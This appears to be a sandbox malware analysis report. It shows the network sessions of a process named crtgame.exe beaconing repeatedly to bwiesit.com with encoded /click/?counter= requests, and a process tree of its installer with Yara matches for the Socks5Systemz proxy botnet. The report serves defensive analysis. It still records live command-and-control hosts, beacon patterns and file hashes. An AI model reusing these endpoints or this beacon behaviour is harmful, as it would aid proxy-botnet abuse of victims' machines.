Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49844 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:37.337073088 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:38.687474966 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49847 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:38.924432039 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:40.308319092 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49852 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:40.569071054 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:41.915117025 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49858 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:42.143084049 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:43.485140085 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 49861 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:43.725328922 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:45.064199924 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49865 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:45.299034119 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:46.669008970 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49870 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:46.910093069 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:48.257534981 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:48.366138935 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:48.858058929 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49876 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:49.095870972 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:50.475550890 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:50.589442015 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:51.087025881 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:51.194185019 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:51.699235916 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49883 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:51.923937082 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:53.286915064 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49887 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:53.517733097 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:54.907599926 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49893 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:55.143764973 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:56.492563009 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49895 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:56.720815897 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:58.068844080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49899 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:58.299087048 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:59.653589964 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49905 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:59.895632982 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:09:01.284673929 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:09:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49909 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:09:01.520328045 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:09:02.868812084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:09:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49913 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:09:03.106534958 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:09:04.512526035 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:09:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 35 39 34 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 65 65 64 61 63 66 34 34 66 38 36 35 37 39 65 33 63 31 66 39 37 32 66 38 39 35 62 39 38 39 63 33 63 32 39 36 35 34 37 62 63 32 30 32 30 37 31 64 64 39 66 36 65 33 33 38 64 38 63 64 31 33 34 35 61 35 32 38 66 64 30 30 32 66 63 30 66 63 36 64 31 34 32 62 32 32 36 33 39 30 31 35 32 63 33 35 36 32 32 64 62 35 66 66 64 33 37 38 61 34 36 35 39 61 66 32 65 65 61 62 62 31 38 39 30 35 39 34 36 61 33 62 31 61 31 38 33 66 32 64 37 61 34 35 35 65 62 66 32 62 32 38 36 64 64 32 37 33 66 39 63 31 32 62 61 32 65 65 37 37 36 31 33 61 35 62 39 37 65 61 66 30 38 64 61 61 39 37 65 39 39 30 61 61 61 63 33 38 63 33 65 34 62 39 36 62 39 64 31 32 63 39 63 65 66 38 31 65 38 30 35 66 38 34 37 64 66 34 64 32 65 63 34 32 65 62 30 39 30 32 [TRUNCATED]
Data Ascii: [TRUNCATED]
Dec 14, 2024 03:09:04.512572050 CET | 400 | IN | Data Raw: 66 33 35 32 65 66 64 38 34 31 61 33 31 64 38 31 66 37 63 66 39 62 37 30 64 39 37 33 34 61 37 66 30 34 35 39 35 30 37 36 34 39 34 63 37 64 30 36 64 63 63 37 61 61 37 38 37 63 36 31 32 34 34 61 65 64 33 38 66 37 31 36 39 66 34 37 62 65 33 36 61 61
Data Ascii: f352efd841a31d81f7cf9b70d9734a7f04595076494c7d06dcc7aa787c61244aed38f7169f47be36aafa9efdaea910e413c3f9e764ea66879aca46f635a149bae1f64f47b30a8926ef7b0467b636bff6d286fb8d3136f48ebc1cf97e8e39700eb6c387cd9bc50debc3b2ddae547e0cb48ee3ca281514b0dd31e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49923 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:09:08.035353899 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:09:09.444845915 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:09:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Target ID: 0
Start time: 21:07:01
Start date: 13/12/2024
Path: C:\Users\user\Desktop\6hvZpn91O8.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6hvZpn91O8.exe"
Imagebase: 0x400000
File size: 7'246'011 bytes
MD5 hash: 1015B0B5CFDDFBC4BAEA6910D9C56C3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 21:07:01
Start date: 13/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe"
Imagebase: 0x400000
File size: 704'000 bytes
MD5 hash: F448D7F4B76E5C9C3A4EAFF16A8B9B73
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 21:07:03
Start date: 13/12/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\schtasks.exe" /Query
Imagebase: 0x90000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:21:07:03
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:21:07:03
                                                                            Start date:13/12/2024
                                                                            Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                            Imagebase:0x400000
                                                                            File size:2'199'540 bytes
                                                                            MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                            Imagebase:0xda0000
                                                                            File size:47'104 bytes
                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                            Imagebase:0x400000
                                                                            File size:2'199'540 bytes
                                                                            MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:21:07:04
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                            Imagebase:0x6f0000
                                                                            File size:139'776 bytes
                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:21:07:23
                                                                            Start date:13/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                              Execution Graph

                                                                              Execution Coverage:21.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.4%
                                                                              Total number of Nodes:1498
                                                                              Total number of Limit Nodes:22
